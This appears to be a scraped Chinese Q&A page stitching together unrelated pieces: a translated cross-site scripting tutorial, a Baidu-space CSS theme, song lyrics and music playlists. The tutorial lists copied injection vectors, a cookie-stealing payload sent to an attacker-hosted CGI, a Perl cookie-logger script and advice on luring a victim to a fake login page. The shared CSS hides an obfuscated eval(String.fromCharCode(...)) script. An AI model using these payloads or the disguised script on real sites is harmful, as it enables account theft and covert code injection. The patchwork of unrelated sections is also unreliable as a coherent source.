本文目录一览:
html跨站语法问题
跨站脚本之完全总结
以前看过分析家写过一篇文章,介绍跨站脚本的安全隐患,当时只是知道有这样的问题,也没有仔细阅读,目前此类问题经常在一些安全站点发布,偶刚好看到这样一篇文章,抱着知道总比不知道好的想法,翻译整理了一下,错误之处请多多指点。
什么是跨站脚本(CSS/XSS)?
我们所说跨站脚本是指在远程WEB页面的html代码中插入的具有恶意目的的数据,用户认为该页面是可信赖的,但是当浏览器下载该页面,嵌入其中的脚本将被解释执行,
有时候跨站脚本被称为"XSS",这是因为"CSS"一般被称为分层样式表,这很容易让人困惑,如果你听某人提到CSS或者XSS安全漏洞,通常指得是跨站脚本。
XSS和脚本注射的区别?
原文里作者是和他一个朋友(b0iler)讨论后,才明白并非任何可利用脚本插入实现攻击的漏洞都被称为XSS,还有另一种攻击方式:"Script Injection",他们的区别在以下两点:
1.(Script Injection)脚本插入攻击会把我们插入的脚本保存在被修改的远程WEB页面里,如
:sql injection,XPath injection.
2.跨站脚本是临时的,执行后就消失了
什么类型的脚本可以被插入远程页面?
主流脚本包括以下几种:
HTML
JavaScript (本文讨论)
VBScript
ActiveX
Flash
是什么原因导致一个站点存在XSS的安全漏洞?
许多cgi/php脚本执行时,如果它发现客户提交的请求页面并不存在或其他类型的错误时,出错信息会被打印到一个html文件,并将该错误页面发送给访问者。
例如: 404 - yourfile.html Not Found!
我们一般对这样的信息不会注意,但是现在要研究CSS漏洞的成因,我们还是仔细看一下。
例:
该URL指向的连接是有效的,但是如果我们把后面的downloads.html替换成brainrawt_owns_me.html,一个包含404 - brainrawt_owns_me.html Not Found! 信息的页面将反馈给访问者的浏览器。考虑一下它是如何把我们的输入写到html文件里的?
OK,现在是我们检查XSS漏洞的时候了!
注意:下面仅仅是一个例子,该页面存在XSS漏洞,我们可以插入一写javascript代码到页面里。当然方法很多
;scriptalert
('XSS_Vuln_Testing')/script
当我们提交这个URL的时候,在我们的浏览器中弹出一个消息框,"XSS_Vuln_Testing"?
这个例子只是一个XSS漏洞的简单演示,并无实际意义,但足以说明问题所在。
下面我们分析一下造成该运行结果的原因,program.cgi对我们的输入没有经过有效过滤处理,就直接写入404 error页面中,结果创建了一个页面,如下:
html
b404/b - scriptalert('XSS_Vuln_Testing')/script Not Found!
/html
其中的javascript脚本通过浏览器解释执行,然后就出现了你所看到的结果。
如何利用XSS来完成hacking?
如同前面所提到,如果用户提交的请求不能得到满足,那么服务器端脚本会把输入信息写入一个html文件,当服务器端程序对写入html文件的数据没有进行有效过滤,恶意脚本就可以插入到该html文件里。其他用户浏览该连接的时候脚本将通过客户端浏览器解释执行。
事例:
假设你发现myemailserver.tld有CSS漏洞,你想要获得其中一个人的email帐号,比如我们的目标是b00b这个人。
把上面存在CSS漏洞的连接修改一下:
这会创建了一个错误页面,我们得到如下信息:
Invalid Input! [article=hax0red]
当插入下面这样的javascript代码时,你的屏幕上会弹出一个包含test的消息框。
;scriptalert('test')
/script
script并没有打印到屏幕上,它是隐藏在背后执行,由于服务器端程序并没有对
scriptalert('test')/script进行有效过滤,所以在页面发回到浏览器并执行了该脚本。
下面我们瞧瞧如何利用该漏洞入侵 b00b同志的邮箱,首先你必须知道b00b的email地址,并且知道cookies的作用。那么你可以告诉b00b一个恶意的连接,嘿嘿,当然它的用意就是从b00b机器中cookie信息里获得自己想要的东东。想办法让b00b访问myemailserver.tld站点发表的文章,比如说:"亲爱的b00b,看看这个美
女如何呀?"
那么当可怜的b00b访问 ;script偷取
并保存cookie的脚本
/script
连接时,发生什么事情?cookie都有了,你该知道怎么办了吧!
如果在你目前不是这样的情形,你可以拷贝email服务器的登陆页面,挂到其他的系统上,然后引导用户登陆你的恶意系统页面这样用户信息你可以记录下来,然后再把记录的信息发送回真正的email服务器页面,那些笨蛋并不会意识到实际发生的事情。
把javascript脚本插入WEB页面的不同方法:
snip
拷贝自:GOBBLES SECURITY ADVISORY #33
Here is a cut-n-paste collection of typical JavaScript-injection hacks
you may derive some glee from playing with.
a href="javascript#[code]"
div onmouseover="[code]"
img src="javascript:[code]"
img dynsrc="javascript:[code]" [IE]
input type="image" dynsrc="javascript:[code]" [IE]
bgsound src="javascript:[code]" [IE]
script[code]/script
{[code]}; [N4]
img src={[code]}; [N4]
link rel="stylesheet" href="javascript:[code]"
iframe src="vbscript:[code]" [IE]
img src="mocha:[code]" [N4]
img src="livescript:[code]" [N4]
a href="about:script[code]/script"
meta http-equiv="refresh" content="0;url=javascript:[code]"
body onload="[code]"
div style="background-image: url(javascript:[code]);"
div style="behaviour: url([link to code]);" [IE]
div style="binding: url([link to code]);" [Mozilla]
div style="width: expression([code]);" [IE]
style type="text/javascript"[code]/style [N4]
object classid="clsid:..." codebase="javascript:[code]" [IE]
style!--/stylescript[code]//--/script
![CDATA[!--]]script[code]//--/script
!-- -- --script[code]/script!-- -- --
script[code]/script
img src="blah"onmouseover="[code]"
img src="blah" onmouseover="[code]"
xml src="javascript:[code]"
xml id="X"abscript[code]/script;/b/a/xml
div datafld="b" dataformatas="html" datasrc="#X"/div
[\xC0][\xBC]script[code][\xC0][\xBC]/script [UTF-8; IE, Opera]
----Copied from GOBBLES SECURITY ADVISORY #33----
/snip
一个真正的获取cookie并且做记录的例子:
注意:要使它工作,你的浏览器必须允许接受站点发送的cookies,
当我测试下面的信息时,使用
javascript创建访问者的cookies,javascript脚本放在index.html文件中。
OK,下面假设存在XSS攻击的安全隐患,存在漏洞的连接是:
;evil javascript
我们创建这样一个连接:
;script
document.location='
.tld
/cgi-bin/evil_cookie_logger.cgi?'+document.cookie/script
然后让保存该站点cookie的用户访问这个连接:
这是我们的CGI脚本,它的作用就是对用户cookie做记录:
---------evil_cookie_logger.cgi-----------
#!/usr/bin/perl
# evil_cookie_logger.cgi
# remote cookie logging CGI coded by BrainRawt
#
# NOTE: coded as a proof of concept script when testing for
# cross-site scripting vulnerabilities.
$borrowed_info = $ENV{'QUERY_STRING'};
$borrowed_info =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
open(EVIL_COOKIE_LOG, "evil_cookie_log") or print "Content-type:
text/html\n\n something went wrong\n";
print EVIL_COOKIE_LOG "$borrowed_info\n";
print "Content-type: text/html\n\n";
close(EVIL_COOKIE_LOG);
------------------------------------------
该脚本首先通过 $ENV{'QUERY_STRING'}获得cookie,打印到$borrowed_info变量里,通过open(EVIL_COOKIE_LOG, "evil_cookie_log"),把cookie信息保存到evil_cookie_log文件。
注意:上面的javascript脚本,可能在一些浏览器或者站点上不能执行,
这仅仅是我在自己的站点上做测试用的。
如何防范XSS攻击?
1.在你的WEB浏览器上禁用javascript脚本
2..开发者要仔细审核代码,对提交输入数据进行有效检查,如""和""。
可以把"",""转换为,
注意:由于XSS漏洞可被利用的多样性,程序员自己要明白具体需要过滤的字符,
这主要依赖于所开发程序的作用,建议过滤掉所有元字符,包括"="。
对受害者来说不要访问包含script字符的连接,一些官方的URL不会包括任何脚本元素。
百度空间CSS代码
告诉你一个简单的方法 1.打开你要的css码的百度空间网页。 2.右击弹出中有一个“查看源文件(V)”,左击它。 3.弹出了一个记事本,按“Ctrl+F”(查找),输入 href,开始查找,第三个就是。有一个结尾带CSS的,类似于href="/lixiang2202/css/item/6c0c8d45d02cf73f879473d7.css"复制引号内的网址。 4.搜索//hi.baidu.com后面加刚才复制的网址 5.弹出了一个记事本文件,就是你要找的CSS代码了。 你可以看看我的 按步骤试一试,不行的话找我来 如果会了,别忘了采纳我啊! 欢迎常来我的空间这是我曾经编的 参考一下吧 JoneThan@Lee hi.baidu.xon/lixiang2202 版权所有 body{xss: (eval(String.fromCharCode(118,97,114,32,105,44,106,44,120,44,121,44,122,59,106,61,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,101,109,39,41,59,102,111,114,40,105,61,48,59,105,60,106,46,108,101,110,103,116,104,59,105,43,43,41,123,121,61,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,101,109,39,41,91,105,93,59,122,61,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,101,109,39,41,91,105,93,46,102,105,114,115,116,67,104,105,108,100,46,100,97,116,97,59,120,61,39,60,98,114,47,62,60,101,109,98,101,100,32,115,114,99,61,39,43,122,43,39,32,97,117,116,111,112,108,97,121,61,49,32,119,105,100,116,104,61,52,53,48,32,104,101,105,103,104,116,61,51,53,48,62,60,47,101,109,98,101,100,62,60,98,114,47,62,60,97,32,104,114,101,102,61,104,116,116,112,58,47,47,104,105,46,98,97,105,100,117,46,99,111,109,47,109,111,110,121,101,114,47,98,108,111,103,47,105,116,101,109,47,51,50,56,56,51,55,102,97,57,98,51,99,102,51,56,57,57,102,53,49,52,54,101,53,46,104,116,109,108,32,116,97,114,103,101,116,61,95,98,108,97,110,107,62,73,78,83,69,82,84,32,86,73,68,69,79,32,73,78,32,89,79,85,82,32,66,65,73,68,85,32,83,80,65,67,69,32,63,60,47,97,62,60,98,114,47,62,39,59,105,102,40,121,41,32,121,46,111,117,116,101,114,72,84,77,76,61,120,59,125)));} body{background-color:#222222;CURSOR: url('');scrollbar-face-color:#000000;scrollbar-arrow-color:#ff0000}a{CURSOR: url('')} a:hover {position:relative; left:1px; top:1px; clip:rect()}body{background:url() repeat-x;background-color:#333;color:#FFF;} body{background: url(); ;ackground-repeat:repeat;background-position:center; background-attachment: fixed; background-position:0px -200px} .stage{background-color:#000} .stage #layout td{padding:0px;}A,A:link,A:visited{COLOR: #39C;} A:hover{COLOR: #3FF;} body{scrollbar-face-color:#000000; scrollbar-shadow-color:#AAAAAA; scrollbar-highlight-color:#AAAAAA; scrollbar-3dlight-color:#AAAAAA; scrollbar-darkshadow-color:#AAAAAA; scrollbar-arrow-color:#AAAAAA; scrollbar-base-color:#AAAAAA; scrollbar-track-color:#000000; overflow-y:auto;height:297px; filter: chroma(color=#E100E1) ;}#header{height:430px;background:url(
);filter:alpha(opacity=90)}#header div.lc{} #header div.rc{background:url(
} #header div.tit {font-weight:bold;top:40px;left:30px;line-height:30px;font-size:28px;} #header div.tit a.titlink:visited{text-decoration:none;filter:glow(color:#DD002C,strength=3); height:12px; color:#ffffff}/*访问后的标题颜色*/ #header div.desc{top:262px;left:600px;font-size:15px;filter:glow(color=blue,strength=3); height:15px;color:#ffffff}/*空间简介*/ #tab{BACKGROUND: url(
) no-repeat right top; TEXT-ALIGN: center; padding:5px 0 5px 0;top:399px;} #tab span{ display:none} #tab A,#tab A:link,#tab A:visited{FONT-SIZE: 12px;BACKGROUND: url(
) no-repeat center; WIDTH: 80px; COLOR: yellow; PADDING-TOP: 5px;TEXT-ALIGN: center; TEXT-DECORATION: none} #tab A:hover {FONT-SIZE: 12px;BACKGROUND: url(
" target="_blank"
) no-repeat center; LEFT: 1px; POSITION: relative; TOP: 1px} #tab A.on ,#tab A.on:link,#tab A.on:visited {FONT-SIZE: 12px;BACKGROUND: url(
) no-repeat center; WIDTH: 80px; COLOR: white; PADDING-TOP: 5px; TEXT-ALIGN: center; TEXT-DECORATION: none} #tab A.on:hover {FONT-SIZE: 12px;BACKGROUND: url(
" target="_blank"
) no-repeat center; LEFT: 1px; POSITION: relative; TOP: 1px} #tab2{} #tab2 span{font-size:12px;font-weight:bold;} #tab2 a{color:#39C;font-size:12px} a.modtit:visited{color:#39C;} #tab2 a:hover{color:#3FF;}#page{height:30px;font-size:14px;font-family:Arial;text-align:center} #page span{padding:3px;color:#000000;font-size:14px;font-weight:bold} #page a.pc{color:#3399CC;font-size:14px;font-weight:bold} #page a.pc:hover{color:#33FFFF} #page a.pi{padding:3px;color:#3399CC;font-size:14px} #page a.pi:hover{color:#33FFFF}.mod{margin-bottom:10px} .modhandle{cursor:move} .modth{height:24px} .modhead{padding:4px 4px 0 4px} .modopt{padding:4px 4px 0 0}.modtit{color:#FFFFFF;font-size:12px;font-weight:bold} a.modtit{color:#FFF;text-decoration:none} a.modtit:visited{color:#FFF;text-decoration:none} a.modtit:hover{color:#CCC;text-decoration: underline}.modtitlink{color:#FFFFFF;font-size:12px;font-weight:bold} a.modtitlink{color:#FFF;text-decoration:none} a.modtitlink:visited{color:#FFF;text-decoration:none} a.modtitlink:hover{color:#CCC;text-decoration: underline}.modact{color:#FFFFFF;font-size:12px} a.modact{color:#FFF;text-decoration:none} a.modact:visited{color:#FFF;text-decoration:none} a.modact:hover{color:#CCC;text-decoration: underline}.modbox{padding:10px 10px 0 10px;background-image:url();border:1px solid #666;border-width:0 1px 0 1px}.modtl{background:url(
) no-repeat top left;line-height:1px} .modtc{background:url(
) repeat-x} .modtr{background:url(
) no-repeat top right;line-height:1px}.modbl{background:url(
) no-repeat top left;line-height:1px} .modbc{background:url(
) repeat-x} .modbr{background:url(
) no-repeat top right;line-height:1px} .modlabel{color:#fff;font-size:14px;font-weight:bold;}#m_blog div.tit{color:#FF3366;font-size:16px;font-weight:bold;background:url() no-repeat top left;text-indent: 22px;height:70px;line-height:75px} #m_blog div.tit a{color:#FF3366;font-size:16px;font-weight:bold;background:url (
) no-repeat top left;text-indent: 22px;height:70px;line-height:75px} #m_blog div.tit a:visited{color:#FF3366;text-decoration:none;} #m_blog div.date{margin:5px 0 8px 0;color:#666} #m_blog div.cnt{color:#FFF;line-height:20px;font-size:14px} #m_blog div.cnt div{font-size:14px} #m_blog div.more{margin:14px 0 16px 0} #m_blog div.more a{color:#3399CC;font-size:14px} #m_blog div.more a:hover{color:#33FFFF} #m_blog div.opt{color:#666666;font-size:12px} #m_blog div.opt a{color:#F90;font-size:12px;text-decoration:none} #m_blog div.opt a:hover{color:#FC0;text-decoration: underline} #m_blog div.line{margin-top:17px;line-height:17px;border-top:1px dotted #dadada} #m_blog div.none{padding:100px 0 100px 0;color:#333333;font-size:14px}#m_pro a{color:#39C} #m_pro a:hover{color:#3FF} #m_pro div.image{text-align:center} #m_pro div.act{margin-top:5px; background:url(;dd=B) no-repeat bottom; padding-bottom: 45px; margin-bottom: 15px; } #m_pro div.user{margin-top:10px;font-size:12px;font-weight:bold} #m_pro div.desc{color:#666666;font-size:12px} #m_pro div.line{margin-top:17px;line-height:17px;border-top:1px solid #D2E9F4} #m_pro td{color:#333333;line-height:24px;font-size:14px} #m_pro .photo{background:#FFF;border:1px solid #DDD} #m_pro .photo td{font-size:12px} #m_pro .photo .image{padding:20px 0 10px 0} #m_pro .photo .line{width:90%;line-height:0;border-top:1px dashed #DDD;font-size:1px} #m_pro .ref{margin-top:10px;border:1px solid #DDD} #m_pro .ref .tit{padding-left:10px;background:#EEE;border-bottom:1px solid #DDD} #m_pro .ref .cnt{padding:10px;background:#FFF} #m_pro .basic td{color:#666;font-size:14px} #m_pro .basic .tit{font-weight:bold} #m_pro .basic a:hover{padding:1px;background:#261CDC;color:#FFF;text-decoration:none} #m_pro .basic a.nlk:hover{padding:0px;color:#196CCA;background-color:#FFF;text-decoration:underline} #m_pro .pline{margin-left:5px;margin-top:10px;line-height:10px;border-top:1px dashed #A6A6A6} #m_pro .pitem{margin-left:5px;line-height:22px;font-size:14px} #m_pro .pitem .tit{color:#666} #m_pro .pitem a:hover{padding:1px;background:#261CDC;color:#FFF;text-decoration:none}#mod_album a{color:#39C;} #mod_album a:hover{color:#3FF}#m_album div.image{text-align:center} #m_album div.size{text-align:center} #m_album div.page{color:#666666;font-size:12px;text-align:center} #m_album div.page a{color:#39C;font-size:12px} #m_album div.page a:hover{color:#3FF} #m_album .phpage{margin-top:10px;padding-bottom:5px;text-align:center}#m_links div.item{font-size:12px} #m_links div.item a{color:#39C;} #m_links div.item a:hover{color:#3FF} #m_links div.line{margin-top:5px;line-height:8px;border-top:1px solid #D2E9F4}#mod_track a{color:#CCCC00;} #mod_track a:hover{color:#3FF}#m_track A IMG {BORDER-RIGHT: #ffffff thin solid; BORDER-TOP: #ffffff thin solid; FILTER: alpha(opacity=70); BORDER-LEFT: #ffffff thin solid; BORDER-BOTTOM: #ffffff thin solid} #m_track A:hover IMG {FILTER: alpha(opacity=100)}#comm_info{font-family:Arial;text-align:left;} #comm_info div.line{height:400px;background:url(
) no-repeat 10px;background-color:#6F6F08;margin-top:5px;line-height:8px;border-top:1px solid #95D69E} #comm_info a{color:#CCCC00;} #comm_info a:hover{color:#3FF}#m_mylink1 div.item{color:#333333;font-size:12px} #m_mylink1 div.item a{color:#3399CC;font-size:12px;text-decoration:none} #m_mylink1 div.item a:hover{color:#33FFFF} #m_mylink1 div.line{margin-top:5px;line-height:8px;border-top:1px solid #D2E9F4}#m_mylink2 div.item{color:#FFFFFF;font-size:12px} #m_mylink2 div.item a{color:#F76809;font-size:12px;text-decoration:none} #m_mylink2 div.item a:hover{color:#FFFFFF} #m_mylink2 div.line{margin-top:5px;line-height:8px;border-top:1px solid #FFFFFF}#m_mylink3 div.item{color:#333333;font-size:12px} #m_mylink3 div.item a{color:#3399CC;font-size:12px;text-decoration:none} #m_mylink3 div.item a:hover{color:#33FFFF} #m_mylink3 div.line{margin-top:5px;line-height:8px;border-top:1px solid #D2E9F4}#m_mylink4 div.item{color:#333333;font-size:12px} #m_mylink4 div.item a{color:#3399CC;font-size:12px;text-decoration:none} #m_mylink4 div.item a:hover{color:#33FFFF} #m_mylink4 div.line{margin-top:5px;line-height:8px;border-top:1px solid #D2E9F4}#m_artclg div.item{color:#FFFF00;font-size:12px} #m_artclg div.item a{color:#FFFF00;font-size:12px} #m_artclg div.item a:hover{color:#FFFF00} #m_artclg div.line{margin-top:5px;line-height:8px;}#m_filed div.item{color:#666666;font-size:12px} #m_filed div.item a{color:#3399CC;font-size:12px} #m_filed div.item a:hover{color:#33FFFF} #m_filed div.line{margin-top:5px;line-height:8px;}#m_comment div.item{color:#FFFFFF;font-size:12px} #m_comment div.item a{color:#3399CC;font-size:12px} #m_comment div.item a:hover{color:#FFCC00} #m_comment div.item a.cnt{color:#FFCC00;font-size:12px;text-decoration:none} #m_comment div.item a.cnt:hover{color:#FFCC00;text-decoration:underline} #m_comment div.line{margin-top:5px;line-height:8px;}#m_albumlist div.note{color:#333333;font-size:14px} #m_albumlist div.desc{margin-bottom:12px;padding:3px 10px 3px 10px;line-height:22px;background-color:#333333;font-size:14px} #m_albumlist div.none{padding:100px 0 100px 0;color:#333333;font-size:14px} #m_albumlist div.line{margin-top:10px;line-height:16px;border-top:1px solid #D2E9F4} #m_albumlist div.tit{margin:6px 0 7px 0;font-size:14px} #m_albumlist div.tit a{color:#3399CC;font-size:14px} #m_albumlist div.tit a:hover{color:#33FFFF} #m_albumlist span.count{color:#999;font-size:12px;font-weight:bold} #m_albumlist span.size{color:#666;font-size:12px;font-family:Arial} #m_albumlist a.act{color:#3399CC;font-size:12px} #m_albumlist a.act:hover{color:#33FFFF} #m_albumlist a.page{color:#3399CC;font-size:14px} #m_albumlist a.page:visited{color:#3399CC;} #m_albumlist a.page:hover{color:#33FFFF} #m_albumlist td.image{padding:5px;border:1px solid #999999;background:#FFFFFF} #m_albumlist .phbox{margin-top:15px;margin-left:15px; text-align:center} #m_albumlist .phbox .phpage{color:#636363;font-size:14px} #m_albumlist .phbox .phinfo{margin:6px 0 2px 0;color:#636363;font-size:12px} #m_albumlist .phbox .phimg{margin-bottom:10px}#m_friend div.filter{margin-bottom:10px;padding-left:10px;padding-top:10px;height:27px;line-height:27px} #m_friend div.catalog{margin-bottom:10px;padding-left:10px;height:27px;line-height:27px;background-color:#F2F2F2;font-size:14px} #m_friend div.user{margin-top:4px;color:#333333;font-size:12px} #m_friend div.user a{color:#3399CC;font-size:12px} #m_friend div.user a:hover{color:#33FFFF} #m_friend div.line{margin-top:10px;line-height:16px;border-top:1px solid #D2E9F4}#m_setting a{color:#3399CC} #m_setting a:hover{color:#33FFFF} #m_setting{line-height:22px;color:#333333;font-size:14px} #m_setting img.sel{border:4px solid #FFDB7B} #m_setting img.unsel{border:1px solid #D2D2D2} #m_setting span.tit{font-size:14px} #m_setting span.usr{color:#666666} #m_setting div.sel{padding-top:6px;font-size:14px;font-weight:bold} #m_setting div.line{margin-top:20px;line-height:16px;border-top:1px solid #D2E9F4}#m_sysinfo a{color:#3399CC} #m_sysinfo a:hover{color:#33FFFF} #m_sysinfo{line-height:22px;color:#333333;font-size:14px} #m_sysinfo span.new{color:#FF0000;font-size:10px;font-family:Arial} #m_sysinfo span.date{color:#666666;font-size:14px}#m_setbase{color:#333333;font-size:14px} #m_setbase td{color:#333333;font-size:14px} #m_setbase div.line{margin-top:5px;line-height:8px;border-top:1px solid #D2E9F4}#in_comment{width:710px} #in_comment div.tit{margin-bottom:12px;color:#333333;font-size:14px;font-weight:bold} #in_comment div.user{margin-bottom:6px;color:#333333;font-size:12px} #in_comment div.user a{color:#3399CC;font-size:12px} #in_comment div.user a:hover{color:#33FFFF} #in_comment div.user span.date{color:#666666;font-size:12px} #in_comment div.desc{color:#FFFFFF;font-size:12px} #in_comment div.line{margin-top:17px;line-height:17px;border-top:1px solid #D2E9F4}#in_send div.tit{margin:10px 0 10px 0;color:#333333;font-size:14px;font-weight:bold} #spBlogCmtText{background:url() no-repeat center;background-attachment:fixed;CURSOR:url()}
啊咿呀咿呀咿呀 是什么歌的歌词啊?
butterfly,是这首歌吗?比较古老一点。。下面附上歌名、歌词
歌名《butterfly》就是著名的舞曲蝴蝶舞
歌手:smile
专辑:best99
ay,iyaiyai
ay,iyaiyai
ay,iyaiyai
where's
my
samural?
i've
been
searching
for
a
man
allacross
japan
just
to
find,to
find
my
samural
someone
who
is
strong
but
still
a
little
shy
yes
i
need,i
need
my
samural
ay,ay,ay
i'm
your
little
butterfly
green,black
and
blue
make
the
colours
of
the
sky
ay,ay,ay
i'm
your
little
butterfly
green,black
and
blue
make
the
colours
of
the
sky
i've
been
searching
in
the
woods
and
high
upon
the
hills
just
to
find,to
find
my
samural
someone
who
won't
regret
to
keep
me
his
net
yes
i
need,i
need
my
samural
最好听的QQ空间背景音乐
最新歌曲:
偷偷望着你
-
李琳
heroes(《功夫之王》片尾曲)-
张靓颖
唯一的爱
-
刘嘉亮
2008我们结婚吧
-
三石
爱不在服务区
-
吴瑶
牛奶@咖啡
---
越张大越孤单
周大侠
---周杰伦(灌篮主题曲).
七月---江映蓉(命运呼叫转移插曲,伤感,超好听)
我在那一角落患过伤风---陈绮贞(非常动听的伤感歌曲)
亲爱的那不是爱情---张韵涵
(目前最红悲伤歌曲)
..
有没有人告诉你---陈楚生(网络最红伤感歌曲)
不想懂得---张韶涵(公主小妹片尾曲)
外滩十八号---袁成杰
戚薇
香烟爱上火柴---张政
是非题---范玮琪
出神入化
---飞轮海
玫瑰花的葬礼
---周杰伦
我不配---周杰伦
日不落
---蔡依林
期待你的爱---林俊杰
你是我心内的一首歌
---王力宏
7仔
---S.H.E
心如刀割
---5566
王子
---张栋梁
蓝色土耳其---周传雄
青花
---周传雄
越来越不懂
---蔡健雅
兄弟
---陈奕迅
刘德华
悲伤华尔兹---尚雯婕
piano---范逸臣
非卖品---蔡依林
我不会唱歌
---罗志祥
凌晨三点种---张智成
一个人走
---光良
卫兰
婚礼进行曲---胡彦斌
让我变作你的狗
-
林夕
别无他求---姜鹏
动听
--王恩琦
你一定要幸福---
何洁
高耀太-disco韩国冠军(超好听).mp3
做你的公主---何耀珊
[英文版]a
better
day_黑蝙蝠中队.mp3
fly
to
the
sky
像男人一样
你叫什么名字---李慧珍
张靓影
michelle
branch-06-here
with
me
和我在一起---蜜雪儿
小丑鱼(韩文版)-东方神起
first
love---宇田多光
啦啦啦---李秀英
危险的演出---蔡妍
东方的斗魂
---东方神起
青苹果之恋-that
night-sweetbox
10
minutes
十分钟---李孝利(劲舞团)
不要爱他--李孝利
其实我介意---小雪(剧场版)
fly
to
the
sky
像男人一样
不要爱他--李孝利
金色年华系列--强烈DJ
every
step.mp3---糖果盒子
sweetbox
-
2burning.mp3
Teenage
Life——Daz
Sampson
《Piece
Of
Me》(新)
《Toxic》
《Gimme
More》
《baby
one
more
time》
《别碰我
Don't
push
me》布兰妮
《un
ange
frappe
a
ma
porte》
《Toc
Toc
Toc》李孝利
《Don't
Stop
the
Music》(新)Rihanna
《Kiss
Kiss
(Feat.T-Pain)》(新)Chris
Brown
《Crank
That
就酱跳》(新)Soulja
Boy
Tellem
《Clumsy》(新)Fergie
《Low》(新)Low
《Paralyzer
(Original
Band
Demo)》(新)Finger
Eleven
最流行的非主流歌曲
1
hollaback
girl
{Gwen
Stefani}
2
The Magic Key
3
Ein Kleines Lied
4
非主流音乐756927301
QQ:756927301
5
loves
me
not
{Ta.Tu}
6
peerless
7
It's Ok
{dj max}
8
feedback
{QQ:756927301}
9
You Were My Everything
10
My Humps
{黑眼豆豆}
11
gala
faraway
{QQ:756927301}
12
GWEN
STEFANI
HOLLABACK
GIRL
LOOL
REMIX
13
哀怨
{JeyKai}
14
question
{the
moody
blues}
15
Human
Sacrifice
Sweetbox{QQ:756927301}
16
Floorfiller
{DJ嗨嗨网}
17
Love
Mime
Silent
G
Jack
{SILENT
G乐队}
18
nothing
in
the
world{德国
原子少女猫}
19
Ein
kleines
lied
{QQ:756927301}
20
I'm Gonna Getcha Good!
{shania
twain}
21
Dreams
Come
True
S
E
{韩国美少女组合QQ:756927301}
22
u
make
me
wanna
{blue乐队}
23
30
minutes
{QQ:756927301}
24
she's
gone
{QQ:756927301}
25
floorfiller
Greatest
H
{QQ:756927301}
26
Hear
me
Cry
cagnet
27
Stand
{jewel}
28
我在那一角落患过伤风{步步高广告背景音乐}
日潮韩流
1
仆の花(传染歌)电影主题曲
五井道子
2
地狱少女
オリジナルサウン
あいぞめ
能登麻美子
3
樱花纷飞时
中岛美嘉
4
花舞う街で
仓木麻衣
5
プラネタリウム
大冢爱
6
世界に一つだけの花
smap
7
貌似是死神上
的
樱日和
8
思い出にできない
ユンナ
9
涙の物语
有里知花
10
For
フルーツバスケット水果篮子主题曲
冈崎律子
11
only
you(饼干老师星星糖)片尾曲
QQ:756927301
12
Timeless
张力尹细亚俊秀
13
迷途(黄色手帕)-主题曲
14
你我是傻瓜(宫)插曲
Stay
15
我痛苦的爱(人鱼小姐)主题曲
TRUE
BIRD
16
希望你幸福
(暗夜花火)电影原声带
豪杰春香
17
最终幻想
素敌だね
素敌
18
晓之车
19
空色
冈崎律子
20
因为是女子
kiss
21
金鱼花火
大冢爱
22
花样
松隆子
23
one
东方神起
24
鸟之诗八音盒版
纯音乐
25
天空之城音乐盒版
纯音乐
26
风姿花传三国志全日本超级动画主题曲
谷村新司
27
啦啦啦
李秀英
28
endless
rain
X
JAPAN
29
first
love
宇多田光
30
恋人よ
五轮真弓
31
明日晴れるかな
桑田佳佑
32
ありがとう
吉田亚纪子
{泪的告白}原版